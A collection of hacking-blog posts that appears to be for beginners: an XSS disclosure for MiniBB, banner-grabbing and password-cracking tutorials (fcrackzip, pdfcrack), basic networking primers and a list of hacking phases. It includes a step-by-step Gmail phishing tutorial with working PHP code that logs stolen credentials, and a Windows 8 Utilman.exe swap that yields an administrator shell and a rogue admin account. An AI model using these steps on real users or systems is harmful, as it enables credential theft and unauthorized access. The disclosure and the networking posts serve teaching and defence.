I have found Stored Cross Site Scripting Vulnerability in MiniBB Forums Software ( v3.2.2)

Description:

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

Severity: High

POC:

Steps to reproduce:

1. Login into Administrative Panel of MiniBB application. Click on Add Forum.
2. Enter below XSS payload in supertitle field

Payload: <sVg/oNloAd=alert(“xss”)//>

3. Next, click on Add Forum button. The forum gets successfully added.
4. When any user visits the Forums (homepage), our XSS payload gets executed as shown in below screenshot.

Screenshot:

The vulnerability will be patched in next version of MiniBB Forums Software i.e v.3.3

In our previous post,we saw how to grab the banner of a  particular port of the target machine using simple TELNET utility.

In this tutorial, we are going to use the advanced windows based tool for grabbing the banner. With this tool,we can grab the banners of all the open ports in one stroke!

So…The tools works as follows:-

1. Scanline scans our target for all the open ports (TCP as well as UDP).

2. Once all the open ports are identified, it grabs the banner of these individual ports and displays it!

Amazing!

You can download this tools here:

http://b2b-download.mcafee.com/products/tools/foundstone/scanline.zip

Ok….So…let’s grab the banner of our target!

Our target:192.168

1.Extract scanline.zip in ‘C:’ drive or whichever drive you wish to!

2. Open command prompt.

3. Navigate to the directory in which you extracted scanline.zip

4. Type the following command

sl  -v -b [your-target-ip-address]

Eg: sl -v -b 192.168.56.102

5.Hit Enter key.

This is what we get…

WHoaaaaaa!!!!! Fantastic!

WE GOT ALL THE OPEN PORTS with THEIR BANNERS EXPOSED….LOADS OF INFORMATION EXPOSED!

Amazing!

That’s all for this post…

Thank you!

This is a very new post on “Banner Grabbing”.  The idea is…. We will try to grab the banner hosted by the HTTP protocol on target system!

Now what do we get???

Let’s see!

Step 1: Boot up your Backtrack machine.

Step 2: Identify the IP address of target machine. (In my case it happens to be 192.168.56.102).

Step 3: Invoke your shell( terminal).

Step 4:  Type the following command:-

telnet  [target-ip address]   [port no].

WELL, since we are doing HTTP banner grabbing, port no is 80 and target IP is 192.168.56.102

Let us see what we get:—>

Interesting….!

Now Vital inference that we can draw from the output of the command is the type of Server that the target machine has.

In this case it happens to be MICROSOFT IIS 5.1 server!!!

Now if you just search on google what vulnerabilities and exploits does IIS Server 5.1 have…..you will be astonished!!

So…in short we identified the server type of the target machine….which we can be used to find exploits related to it and can be easily compromised!

SO….BINGO!!

Loads more to come!

Thankkksss a ton!  

In the previous tutorial Cracking PDF files, we saw how to crack password protected PDF files using pdfcrack .

Basically,we demonstrated a password cracking technique called as BRUTEFORCE  attack!

In this tutorial, we will see how to crack zip files using dictionary based attack.

For this, we will be using BACKTRACK OS and an in-built tool known as fcrackzip!

So… LET’S START!

We are having confidential.zip as the target zip file which is password protected!

LET US CRACK THE PASSWORD OF THIS FILE!

Step 1: Boot in your Backtrack OS.

step 2: Invoke a terminal using Cltr-Alt-T key combination or by simply clicking on shell icon!

Step 3:  Syntax of the command is ” fcrackzip -Dp [your-dictionary-file-name with the path] [target-zip-file]”

( We have our confidential.zip file in the root directory)

Our target file in this case is confidential.zip

And our dictionary file is passwords.lst

Step 4: So we type in ” fcrackzip -Dp passwords.lst confidential.zip (HIT ENTER)

AWESOMEEEEEEE!! We Found the password as “google” WITHIN NO TIME!

That’s great,isn’t it?????

I strongly recommend you to kindly explore all the options of “fcrackzip” using following command :

fcrackzip -h (HIT ENTER)

You may notice that fcrackzip also supports BRUTEFORCE attacks, trying using it!

NOTE: If you are not using backtrack, you can download fcrackzip using following command:

sudo apt-get install fcrackzip (HIT ENTER)

SO…..That is it for this tutorial…

HOPE YOU ENJOYED IT!

THANKS!

In the very previous post we saw some password cracking techniques…In case,if you have not gone through it, it is recommended that you go through it once!

Here is the link: Click here

Now we are going to break the password of a PDF File…

We are going to use LINUX operating system for this ( I am using Backtrack 5 R3, my favorite OS)!

Step 1: Install Linux OS in your system or you may use Virtual box also!

Step 2: Invoke a shell by pressing “Ctrl-Alt-T” key combination or my simply clicking on shell icon!

Step 3: We will use linux-based tool called “pdfcrack” here. Install it by typing “sudo apt-get install pdfcrack”. Hit enter.

Step 4: Installation will proceed. Say “yes” when prompted to continue installation.

Step 5: After installation type ” pdfcrack  [your-target-file] ” and hit enter.

For Eg: if your target pdf file is test.pdf. You need to type ” pdfcrack test.pdf” (without quotes ofcourse) and hit enter key.

WHOILAAAAAA!!! We got the password as  “test” (encircled)!

As you can see that pdfcrack was trying combination of characters and attempting to test it as the password. So this is a characteristic of  “BRUTEFORCE” attack!

NOTE: BRUTEFORCE ATTACKS are always successful. The only way you can mitigate this is by using strong and long password. Nevertheless, it can only prolong the attack and not stop it completely!

So…. I hope you really enjoyed this tutorial! Stay tuned! New tutorials coming soon!

THANKS!  

After a long time,I am here with  you all to share some password cracking techniques! This post is just an approach for cracking passwords.

We will not be demonstrating any tool involved in password cracking.This is a theoretical post to make you understand how passwords and stored and what are the methods involved to crack any password!

Dont worry, in coming few posts we will be practically demonstrating the techniques. As of now, just get your concepts clear!

SO…

First of all, many applications provide encryption/hashing for storing passwords…

Your passwords are stored in an encrypted form.

Storing the hashed or encrypted values for passwords is definitely much more secure than storing their plain text in a password file.:).

Steps involved in authentication:

1. The user creates an account.
2. Their password is hashed and stored in the database. At no point is the plain-text (unencrypted) password ever written to the hard drive.
3. When the user attempts to login, the hash of the password they entered is checked against the hash of their real password (retrieved from the database).
4. If the hashes match, the user is granted access. If not, the user is told they entered invalid login credentials.
5. Steps 3 and 4 repeat everytime someone tries to login to their account.

So…basically if we crack the hash….we crack the password..

So…LET US SEE THE WAYS TO CRACK IT:—>

1. Dictionary based attacks

A dictionary attack uses a file containing words that are likely to be used as a password. Each word in the file is hashed, and its hash is compared to the password hash. If they match, that word is the password.

These dictionary files are constructed by extracting words from large bodies of text.

Simple enough!

2. Brute Force attacks

A brute-force attack tries every possible combination of characters up to a given length. These attacks are very computationally expensive, but they will always eventually find the password.

Passwords should be long enough that searching through all possible character strings to find it will take too long!

There is no way to prevent dictionary attacks or brute force attacks. They can be made less effective, but there isn’t a way to prevent them altogether.

If your password hashing system is secure, the only way to crack the hashes will be to run a dictionary or brute-force attack on each hash.

So these are very commom password cracking techniques….We will be looking into practical application of these techniques very soon!

Thanks a lot,

Hope you liked it!

Very interesting topic to share with you all…Its PHISHING……Perhaps the most common attack and easy to implement….in addition…HIGHLY EFFECTIVE!!!!

So…

What is the main motive behind PHISHING ATTACK?

Phishing attack aims at stealing one’s credentials for eg:username,password,etc.

It is a very common form of IDENTITY THEFT attack!

So the idea goes like this,

1. The attacker creates a fake login page of a website on which the target user is registered.

2. He/She then uploads this page on any file hosting website and notes down the link for that page.

3. He/She sends the link to the target user and somehow convinces the target to enter his/her credentials.

4. The credentials entered  by the target are sent to the attacker.

So How do you go about this?

Step 1: Go to the website on which user is registered.

Suppose you want to hack the target’s gmail account…go to gmail.com

Step 2: Right click on the gmail login page and select “view page source” option

Step 3: A new window will open giving you the source code. Copy the source code and paste it into notepad file.

Step 4: Search for “form action” keyword in the notepad file.

Step 5: Replace “action” field value to “login.php” as shown in figure.

Step 6: Save this file as “index.html”

Step 7: Now open notepad and type the following code for login.php

Code:-

<?php

header (‘Location: http://www.enteryoursite.com ‘);  //website to which target will go after the username and password is entered

$handle = fopen(“password.txt”, “a”); //creating a file called “password.txt”

foreach($_GET as $variable => $value) //writing the credentials into password.txt file

{

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fclose($handle); // closing the file

exit; //exit

?>

Step 8: Save this file as “login.php”

Step 9: Now upload index.html and login.php file that we created on a file hosting websites like http://www.000webhost.com/

Step 10: Send the link of “index.html” file to the  target

When the target enters his username and password, it will get stored in “password.txt” file which was created in Step 7.

NICEEEEEEEEE! ISN’T IT?????

To aid phishing attacks we can use email spoofing techniques which we will be seeing soon!

As of now we will discuss some Countermeasures for Phising attacks!

Countermeasures:

1. Dont click on suspicious links.

2. Always check URL while entering your credentials for phishing page links.

3. Use antiphishing tools like Avast!,ESET Smart security. There are many anti-phishing toolbars which notify you about phishing pages like http://toolbar.netcraft.com/

4. And lastly, USE YOUR BRAIN!

So…That’s all for this post…HOPE YOU ENJOYED! I will keep posting more tutorials…..Stay in touch!

NOTE: This tutorial is for education purposes only. Try at your own risk. Offensive Hacking doesn’t hold any responsibility of your actions.

This is one of the coolest and practical topic of networking!!! B)

Ports and Protocols!

So..let us begin… B)

You can think port as a “door” to your node(your computer)…it is a channel for exchange of information what we call as networking…Every communication happens through port.

Protocol in simple words mean the way communication has to take place or the rules for communication on which both the communicating parties agree!

As we know data is exchanged in the form of packets over the network which is done in a standardized way( a protocol ), network clients use different ports to transfer this data!

The port number (and the destination IP address) is included as part of the header in each packet!

So to identify different ports they are assigned numbers…Port numbers vary from 1 to 65536..

There are two types of ports :

1.TCP Ports

2. UDP Ports

so this makes up our next post..TCP and UDP..we will see what are they!

Port numbers are generally divided into three ranges:

1. The Well Known ports: 0 to 1023
2. The Registered ports: 1024 to 49151
3. The Dynamic and/or Private ports: 49152 to 65535

Let us see some famous Port numbers and Protocols associated with it!

20,21	FTP, File Transfer Protocol
22	SSH, Secure Shell
23	Telnet, Remote Terminal Emulation
25	SMTP, Simple Mail Transfer Protocol
50,51	IPSec, Internet Protocol Security
53	DNS, Domain Name Server
67,68	DHCP, Dynamic Host Configuration Protocol
69	TFTP, Trivial File Transfer Protocol
80	HTTP, HyperText Transfer Protocol
110	POP3, Post Office Protocol
119	NNTP, Network News Transfer Protocol
123	NTP, Network Time Protocol
135-139	NetBIOS
143	IMAP4, Internet Message Access Protocol
161	SNMP, Simple Network Management Protocol
389	LDAP, Lightweight Directory Access Protocol
443	HTTPS, HyperText Transfer Protocol with Secure Sockets Layer (SSL)

So…Familiarize yourself with these ports and protocols…to be a good networker or hacker! B)

Thanks…

Hope you enjoyed!

As we learned in the OSI reference model  post that we are going to see TCP/IP model very soon..we come up here with it…

Now, the TCP/IP model is presented in the following figure.’

As we see, it consists of only four layers unlike OSI reference model which consists of seven layers…

Now if we remember,TCP/IP model is the implemented model where OSI model is just a reference model…Right?

BUT WHY??????

Answer is that TCP/IP model provides more flexibility and integration..We can add and remove protocols in it as needed.(protocols?? what are they?? we will see it in next post) whereas

OSI reference model is strictly-defined as far as protocols are concerned and is stubborn for flexibility. As of now, just see protocol as “rules for communication”..

Now coming back to TCP/IP…it consists of four layers:

1. Application layer:

The application layer is the layer nearest the end user. This is the layer that is in charge of translating data from applications into information that can be sent through the network.
The basic functions of this layer are:
– Representation
– Codification
– Dialog Control
– Application Management

2. Transport layer:

The transport layer establishes, maintains and finishes virtual circuits for information transfer. It provides control mechanisms for data flow and allows broadcasting, and it provides
mechanisms for the detection and correction of errors. The information that arrives at this layer from the application layer is divided into different segments. Information that comes to
the transport layer from the internet layer is delivered back to the application layer through ports(coming in next post ).

The basic functions of this layer are:
– Reliability
– Flow Control
– Error Correction
– Broadcasting

3. Internet Layer:

This layer divides the segments of the transport layer into packets and sends the packets across the networks that make up the Internet. It uses IP, or internet protocol addresses to
determine the location of the recipient device. It does not ensure reliability in the connections, because this is already taken care of by the transport layer, but it is responsible
for selecting the best route between the originating device and the recipient device.

4.Network access layer:

This layer is in charge of sending information at both the LAN level and the physical level. It transforms all the information that arrives from the superior layers into basic information (bits) and directs it to the proper location. At this level, the destination of the information is determined by the MAC, or media access control, address of the recipient device.

so this is all about TCP/IP model…in next post we will see about Ports and Protocols working in TCP/IP model….

Hope you liked it!

Thanks

Hope you doin good…:)

This is a chilly-hot post on “hacking windows 8 admin account or any account!”

So…open up your shitty windows 8 box and be ready to fool around!!!!

Let’s go…

1. Your logon screen looks like this…

2.  Insert any Linux Distro media and restart your PC.. (I will be using Ubuntu..)

3. Boot your Linux Distro media…

3. Navigate to “C:\Windows\System32”  folder  via Filesystem

4. Search for “Utilman.exe” file and rename it to “Utilman1.exe”

5. Search for “cmd.exe” file and rename it to “Utilman.exe”

6.  Now remove the linux distro media and restart your PC…

7. Again you have logon screen in front of you..

8. Click on the icon shown in the figure..

9. Whoilaaaaa! You will get a command prompt with administrator privileges… AWESOME…

10. Type “net user add dummy password” (without quotes) in the prompt

11. Next.. type “net localgroup administrators dummy /add”(without quotes) in the prompt

12.Restart your pc, and login with your new user here its “dummy” (without quotes) with password as  “password”(without quotes).

13.  You can delete the old account(“admin” here..) from the control panel as you are the user with administrator privileges…

So…. What did we just do?????????

Now…utilman.exe is the Windows Utility manager giving you access to useful UI settings within Windows…it can be launched by clicking the icon  as we see in step 8.

It is located at “C:\Windows\System32\utilman.exe”

In step.4 and step.5… we renamed original “utilman.exe” to other name say “utilman1.exe” and  renamed command prompt file i.e “cmd.exe” to  “utilman.exe”..

So when we click the icon..utilman.exe is executed which is nothing but the command prompt( remember we are just renaming cmd.exe)

So we get the command prompt with administrator privileges…

Next..we create an account with name as “dummy” and password as “password” in step.10 and made it an administrator account in step.11

After restarting your PC, We can now login with username as “dummy” and password as “password” and delete the old account…

Congrats you are now the administrator…

Hope you enjoyed it..

THANK YOU

Its a lovely morning today! That reminds me of a reference from the previous post….we’ll talk about OSI Reference model!!

Now…we need a particular framework over which computers can communicate with each other through various standards..Long Back in 1947(i guess ), ISO(International Standards Organisation) designed a model for network communications called OSI (Open systems interconnections). An open system is a protocol (set of rules) that allow communications between two parties regardless of their underlying architecture ….

Typically,there are seven layers in OSI model…

See the fig.below

The data passes from application  layer  to physical layer at transmitting side and from physical layer to application layer at receiving side…

A simple diagram explaining it–>

Each Layer add its own header/trailer to the data unit as shown below…the respective header/trailer contains information possessed by that layer about the network communication

Now lets discuss the Layers in more detail–>

Layer 7:Application Layer

-Defines interface to user processes for communication and data transfer in network

-Provides standardized services such as virtual terminal, file and job transfer and operations

Layer 6:Presentation Layer

-Masks the differences of data formats between dissimilar systems

-Specifies architecture-independent data transfer format

-Encodes and decodes data; Encrypts and decrypts data; Compresses and decompresses data

Layer 5:Session Layer

-Manages user sessions and dialogues

-Controls establishment and termination of logic links between users

-Reports upper layer errors

Layer 4:Transport Layer

-Manages end-to-end message delivery in network

-Provides reliable and sequential packet delivery through error recovery and flow control mechanisms

-Provides connectionless oriented packet delivery

Layer 3:Network Layer

-Determines how data are transferred between network devices

-Routes packets according to unique network device addresses

-Provides flow and congestion control to prevent network resource depletion

Layer 2:Data Link Layer

-Defines procedures for operating the communication links

-Frames packets

-Detects and corrects packets transmit errors

Layer 1: Physical Layer

-Defines physical means of sending data over network devices

-Interfaces between network medium and devices

-Defines optical, electrical and mechanical characteristics

There are other network architecture models, such as IBM SNA (Systems Network Architecture) model . Those models are very traditional and hardly play any role in today’s communication standards!

So this covers up the OSI reference model….Next we will put light on TCP/IP model…

So get ready to dive into it…

Thanks

I am finally done with those nasty exams! Feeling damn relaxed!

Back to blogging!!! B)

Well friends,today our topic of discussion is IP ADDRESS!

Well,again many of you might be knowing this,but this post is for novices!

To put it simply, an IP address is your computer’s(a.k.a ‘host’) identity on the internet!! Its nothing more than your computer’s name except that it is made up of digits(unpleasant! right?) :P!

Computers use the unique identifier to send data to specific computers on a network!

In the same sense that someone needs your mailing address to send you a letter, a remote computer needs your IP address to communicate with your computer (simple enough)!

IP stands for “INTERNET PROTOCOL”. What does that mean????

An Internet Protocol is a set of rules that govern Internet activity and facilitate completion of a variety of actions on the World Wide Web for successful two way communication!

Now that flashes me to give a detailed information on protocols in coming few posts!

There are two flavors of IP address: IPv4 and IPv6

IPv4 address is four octet address i.e 32 bit address with each octet seperated  by dot(.) . Eg: 117.156.45.12

Each Octet can have values ranging from 1 to 255! Thus if you see it can address upto  2^32 i.e 4294967296 hosts on the internet!

Amazing! Now as you the population of the world is definitely greater than this figure i.e 4294967296 , what if each one in the world starts using internet?

Quite obviously we will run out of addresses!

To solve this problem,Internet Engineering Task Force (IETF) came up with new addressing scheme called IPv6 which is the latest version of IP!

Now IPv6 is a 128-bit addresses, allowing for 2¹²⁸, or approximately 2^128 i.e 3.4028237e+38 = 3.4 X 10 ^ 38 hosts on the internet! SO….PROBLEM RESOLVED!

IPv6 is having hexadecimal format consist of eight groups of four hex digits separated by colons, for E.g: 2001:0db8:85a3:0042:0000:8a2e:0370:7334.

So wrapping it up..IPv4 and IPv6  are used to addressing hosts on the internet and allowing two-way communications between the hosts!

Next, We will be discussing about OSI reference model and TCP/IP model!

Stay tuned…its all about networks!

Have a great day!

I know the post title seems to be little kiddish but still one needs to refresh the knowledge before we proceed(for those who know what is network)! If you are unfamiliar with network, this is a good post to start with(for those who dont know what network is)!

So lets rock n roll…with NETWORK!!!! B)

Now to put simply, A network is a link or connection between two or more computers(also called as nodes) for sharing resources and exchange of data!!!

Quite obviously, there must be some path between the two which we refer to it as,the physical medium..eg..wires, telephone lines, radio waves, satellites, or infrared light beams,etc,etc,etc…..

So a simple schematic diagram of a network can be as follows:—>

As simple as that!

Don’t worry about the central machine you see in the diagram, we will be coming to that very shortly!

So that is for this post, we will see classification of network depending upon size and architecture in next post, till then…good bye…and hope to see you soon!

THE MORE YOU GET CLOSE TO ALL PHASES,THE MORE STEALTH WILL BE YOUR YOUR ATTACK

PHASES OF HACKING:

1.  RECONNAISSANCE : THIS IS THE PRIMARY PHASE WHERE THE HACKER  TRIES TO COLLECT AS MUCH INFORMATION AS POSSIBLE ABOUT THE TARGET. IT INCLUDES IDENTIFYING THE TARGET,FINDING OUT THE TARGET IP ADDRESS RANGE,NETWORK,DOMAIN NAME REGISTRATION RECORDS OF THE TARGET,MAIL SERVER RECORDS,DNS RECORDS ,ETC,ETC…….

2. SCANNING: THIS MAKES UP THE BASE OF HACKING! THIS IS WHERE PLANNING FOR ATTACK ACTUALLY BEGINS! AFTER RECONNAISSANCE THE ATTACKER SCANS THE TARGET FOR SERVICES RUNNING,OPEN PORTS,FIREWALL DETECTION,FINDING OUT VULNERABILITIES,OPERATING SYSTEM DETECTION,ETC…ETC….

3.GAINING ACCESS: AFTER SCANNING,THE HACKERS DESIGNS THE BLUEPRINT OF THE NETWORK OF THE TARGET WITH THE HELP OF STUFFS COLLECTED DURING PHASES 1 AND 2! NOW THE ATTACKER EXECUTES THE ATTACK BASED ON THE VULNERABILITIES WHICH WERE IDENTIFIED DURING SCANNING! AFTER THE SUCCESSFUL ATTACK,HE GETS ACCESS TO THE TARGET NETWORK!!!! whoaaaaaaaaaaaaaaaa!! HE IS NOW,THE KING!!!
4.MAINTAINING ACCESS: AFTER GAINING ACCESS,THE ATTACKER ESCALATES THE PRIVILEGES TO ROOT/ADMIN AND UPLOADS A PIECE OF CODE(USUALLY CALLED AS BACKDOOR) ON THE TARGET NETWORK SO THAT HE ALWAYS MAINTAIN THE GAINED ACCESS AND CAN CONNECT TO TARGET ANYTIME! B)

5.COVERING TRACK: AFTER GAINING ACCESS AND MAINTAINING THE SAME, HACKER EXPLOITS THE WEAKNESS AND HACKS THE NETWORK OR MISUSES THE ACCESS! AFTER THAT, COMES THE IMPORTANT PHASE—> COVERING THE TRACKS! TO AVOID GETTING TRACED AND CAUGHT,HACKER CLEARS ALL THE TRACKS BY CLEARING ALL KINDS OF LOGS AND DELETED THE UPLOADED BACKDOOR AND  ANYTHING RELATED STUFF WHICH MAY LATER REFLECT HIS PRESENCE!

SO THESE ARE FIVE IMPORTANT PHASES OF HACKING….WHICH EVERY HACKER MUST FOLLOW FOR A SUCCESSFUL ATTACK!

COMING WITH MORE TUTORIALS SOON…………